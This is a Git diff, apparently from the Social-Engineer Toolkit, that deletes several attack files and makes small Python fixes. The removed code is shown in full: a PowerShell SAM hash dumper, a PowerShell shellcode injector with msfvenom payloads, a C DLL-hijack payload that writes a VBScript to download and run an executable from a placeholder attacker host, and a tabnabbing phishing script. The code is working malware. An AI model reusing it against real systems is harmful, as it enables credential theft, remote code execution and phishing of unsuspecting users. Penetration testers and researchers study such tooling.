$NT_exists = $false;
|
||||
# LM header check
|
||||
if ($u.V[0xa0..0xa3] -eq 20)
|
||||
{
|
||||
$LM_exists = $true;
|
||||
}
|
||||
# NT header check
|
||||
elseif ($u.V[0xac..0xaf] -eq 20)
|
||||
{
|
||||
$NT_exists = $true;
|
||||
}
|
||||
|
||||
if ($LM_exists -eq $true)
|
||||
{
|
||||
$lm_hash_offset = $u.HashOffset + 4;
|
||||
$nt_hash_offset = $u.HashOffset + 8 + 0x10;
|
||||
$enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
|
||||
$enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
|
||||
}
|
||||
|
||||
elseif ($NT_exists -eq $true)
|
||||
{
|
||||
$nt_hash_offset = $u.HashOffset + 8;
|
||||
$enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
|
||||
}
|
||||
return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
|
||||
}
|
||||
|
||||
function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
|
||||
{
|
||||
[byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
|
||||
# LM Hash
|
||||
if ($enc_lm_hash)
|
||||
{
|
||||
$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
|
||||
}
|
||||
|
||||
# NT Hash
|
||||
if ($enc_nt_hash)
|
||||
{
|
||||
$nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
|
||||
}
|
||||
|
||||
return ,($lmhash,$nthash)
|
||||
}
|
||||
|
||||
function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
|
||||
{
|
||||
$deskeys = sid_to_key $rid;
|
||||
$md5 = [Security.Cryptography.MD5]::Create();
|
||||
$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
|
||||
$rc4 = NewRC4 $rc4_key;
|
||||
$obfkey = $rc4.encrypt($enc_hash);
|
||||
$hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
|
||||
(des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
|
||||
return ,$hash;
|
||||
}
|
||||
|
||||
function Get-UserKeys
|
||||
{
|
||||
ls HKLM:\SAM\SAM\Domains\Account\Users |
|
||||
where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
|
||||
Add-Member AliasProperty KeyName PSChildName -PassThru |
|
||||
Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
|
||||
Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
|
||||
Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
|
||||
Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
|
||||
}
|
||||
|
||||
function DumpHashes
|
||||
{
|
||||
LoadApi
|
||||
$bootkey = Get-BootKey;
|
||||
$hbootKey = Get-HBootKey $bootkey;
|
||||
Get-UserKeys | %{
|
||||
$hashes = Get-UserHashes $_ $hBootKey;
|
||||
"{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
|
||||
[BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
|
||||
[BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
|
||||
}
|
||||
}
|
||||
DumpHashes
|
|
@ -1,45 +0,0 @@
|
|||
<#
|
||||
Powershell Code Execution 'Exploit'
|
||||
Author: Matthew Graeber
|
||||
Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions.
|
||||
#>
|
||||
|
||||
# Import required functions
|
||||
$code = @"
|
||||
[DllImport("kernel32.dll")]
|
||||
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
||||
[DllImport("kernel32.dll")]
|
||||
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
||||
[DllImport("msvcrt.dll")]
|
||||
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
|
||||
"@
|
||||
|
||||
# Add CSharp code as a class recognized by Powershell
|
||||
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
|
||||
|
||||
# Copy and paste your shellcode here in the form 0xXX.
|
||||
# 32-bit payload
|
||||
# msfvenom windows/exec CMD="cmd /k calc" EXITFUNC=thread
|
||||
[Byte[]]$sc32 = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00
|
||||
|
||||
# 64-bit payload
|
||||
# msfvenom windows/x64/exec CMD="cmd /k calc" EXITFUNC=thread
|
||||
[Byte[]]$sc64 = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00
|
||||
|
||||
# Determine if Powershell is running as 32 or 64 bit
|
||||
[Byte[]]$sc = $sc32
|
||||
if ([IntPtr]::Size -eq 8) {$sc = $sc64}
|
||||
|
||||
# Calculate correct size param for VirtualAlloc
|
||||
$size = 0x1000
|
||||
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
|
||||
|
||||
# Allocate a page of memory. This will only work if the size parameter (3rd param) is at least 0x1000.
|
||||
# Allocate RWX memory block
|
||||
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
|
||||
|
||||
# I could have more easily used memcpy but that would have required the use of a particular .NET class to cast $sc as an IntPtr. I wanted to get this working without needing additional .NET classes. I prefer to KISS (keep it simple, stupid).
|
||||
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
|
||||
|
||||
# Execute you payload
|
||||
$winFunc::CreateThread(0,0,$x,0,0,0)
|
|
@ -129,7 +129,7 @@ if choice == "13":
|
|||
# save our stuff here
|
||||
print(core.bcolors.BLUE +
|
||||
"\n[*] INO file created. You can get it under '{0}'".format(os.path.join(core.userconfigpath,
|
||||
"reports" +
|
||||
"reports",
|
||||
"teensy_{0}.ino".format(now))) +
|
||||
core.bcolors.ENDC)
|
||||
print(core.bcolors.GREEN +
|
||||
|
|
|
@ -1,89 +0,0 @@
|
|||
/*
|
||||
|
||||
DLL Hijacker Attack Written by Dave Kennedy (ReL1K) for the
|
||||
Social-Engineer Toolkit (SET) spear-phishing attack vector.
|
||||
|
||||
This is an ugly cscript downloader, it works on all platforms but
|
||||
will rewrite in C later instead of cscript.
|
||||
|
||||
strFileURL = "http://IPADDRHERE/x"
|
||||
strHDLocation = "C:\x.exe"
|
||||
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
|
||||
objXMLHTTP.open "GET", strFileURL, false
|
||||
objXMLHTTP.send()
|
||||
If objXMLHTTP.Status = 200 Then
|
||||
Set objADOStream = CreateObject("ADODB.Stream")
|
||||
objADOStream.Open
|
||||
objADOStream.Type = 1
|
||||
objADOStream.Write
|
||||
objXMLHTTP.ResponseBody
|
||||
objADOStream.Position = 0
|
||||
Set objFSO = Createobject("Scripting.FileSystemObject")
|
||||
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
|
||||
Set objFSO = Nothing
|
||||
objADOStream.SaveToFile strHDLocation
|
||||
objADOStream.Close
|
||||
Set objADOStream = Nothing
|
||||
End if
|
||||
Set objXMLHTTP = Nothing
|
||||
Set WshShell = WScript.CreateObject("WScript.Shell")
|
||||
WshShell.Run "c:\x.exe"
|
||||
|
||||
*/
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
|
||||
|
||||
int run()
|
||||
{
|
||||
|
||||
FILE *file;
|
||||
char* command = "cmd /c cscript c:\\x.vbs"; // execute the vbs script after fopen write
|
||||
char* host = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // in SET does a replace of the length of IP address then terminates with a null byte to remove the rest of the X's
|
||||
file = fopen("C:\\x.vbs", "w"); // write file x.vbs
|
||||
fprintf(file,"strFileURL = \"http://%s/x\"\nstrHDLocation = \"C:\\x.exe\"\nSet objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\")\nobjXMLHTTP.open \"GET\", strFileURL, false\nobjXMLHTTP.send()\nIf objXMLHTTP.Status = 200 Then\nSet objADOStream = CreateObject(\"ADODB.Stream\")\nobjADOStream.Open\nobjADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\nobjADOStream.Position = 0\nSet objFSO = Createobject(\"Scripting.FileSystemObject\")\nIf objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation\nSet objFSO = Nothing\nobjADOStream.SaveToFile strHDLocation\nobjADOStream.Close\nSet objADOStream = Nothing\nEnd if\nSet objXMLHTTP = Nothing\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\nWshShell.Run \"c:\\x.exe\"", host); // write the downloader file, this will grab an executable
|
||||
fclose(file); // close the file
|
||||
|
||||
STARTUPINFO si;
|
||||
PROCESS_INFORMATION pi;
|
||||
|
||||
ZeroMemory( &si, sizeof(si) );
|
||||
si.cb = sizeof(si);
|
||||
ZeroMemory( &pi, sizeof(pi) );
|
||||
si.dwFlags = STARTF_USESHOWWINDOW;
|
||||
si.wShowWindow = SW_HIDE; // hide the window
|
||||
|
||||
// Start the child process.
|
||||
if( !CreateProcess( NULL, // No module name (use command line)
|
||||
command, // Command line
|
||||
NULL, // Process handle not inheritable
|
||||
NULL, // Thread handle not inheritable
|
||||
FALSE, // Set handle inheritance to FALSE
|
||||
0, // No creation flags
|
||||
NULL, // Use parent's environment block
|
||||
NULL, // Use parent's starting directory
|
||||
&si, // Pointer to STARTUPINFO structure
|
||||
&pi ) // Pointer to PROCESS_INFORMATION structure
|
||||
)
|
||||
|
||||
// Wait until child process exits.
|
||||
WaitForSingleObject( pi.hProcess, INFINITE );
|
||||
|
||||
// Close process and thread handles.
|
||||
CloseHandle( pi.hProcess );
|
||||
CloseHandle( pi.hThread );
|
||||
sleep(5);
|
||||
|
||||
exit(0);
|
||||
return 0;
|
||||
}
|
||||
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
|
||||
{
|
||||
run();
|
||||
return 0;
|
||||
}
|
||||
|
Binary file not shown.
Binary file not shown.
|
@ -1,65 +0,0 @@
|
|||
(function(){
|
||||
|
||||
var TIMER = null;
|
||||
var HAS_SWITCHED = false;
|
||||
|
||||
window.onblur = function(){
|
||||
TIMER = setTimeout(changeItUp, 1000);
|
||||
}
|
||||
|
||||
window.onfocus = function(){
|
||||
if(TIMER) clearTimeout(TIMER);
|
||||
}
|
||||
|
||||
favicon = {
|
||||
docHead: document.getElementsByTagName("head")[0],
|
||||
set: function(url){
|
||||
this.addLink(url);
|
||||
},
|
||||
|
||||
addLink: function(iconURL) {
|
||||
var link = document.createElement("link");
|
||||
link.type = "image/x-icon";
|
||||
link.rel = "shortcut icon";
|
||||
link.href = iconURL;
|
||||
this.removeLinkIfExists();
|
||||
this.docHead.appendChild(link);
|
||||
},
|
||||
|
||||
removeLinkIfExists: function() {
|
||||
var links = this.docHead.getElementsByTagName("link");
|
||||
for (var i=0; i<links.length; i++) {
|
||||
var link = links[i];
|
||||
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
|
||||
this.docHead.removeChild(link);
|
||||
return; // Assuming only one match at most.
|
||||
}
|
||||
}
|
||||
},
|
||||
|
||||
get: function() {
|
||||
var links = this.docHead.getElementsByTagName("link");
|
||||
for (var i=0; i<links.length; i++) {
|
||||
var link = links[i];
|
||||
if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
|
||||
return link.href;
|
||||
}
|
||||
}
|
||||
}
|
||||
};
|
||||
|
||||
function createSite(){
|
||||
window.location.href = "index2.html";
|
||||
var oldFavicon = favicon.get() || "/favicon.ico";
|
||||
}
|
||||
|
||||
function changeItUp(){
|
||||
if( HAS_SWITCHED == false ){
|
||||
createSite();
|
||||
favicon.set("URLHERE/favicon.ico");
|
||||
// favicon.set("https://mail.google.com/favicon.ico");
|
||||
HAS_SWITCHED = true;
|
||||
}
|
||||
}
|
||||
|
||||
})();
|
|
@ -171,7 +171,7 @@ try:
|
|||
# open file for writing
|
||||
filewrite = open(userconfigpath + "web_clone/index.html", "w")
|
||||
# write the data back from the request
|
||||
filewrite.write(html)
|
||||
filewrite.write(html.decode("utf-8"))
|
||||
# close the file
|
||||
filewrite.close()
|
||||
|
||||
|
|
Loading…
Reference in a new issue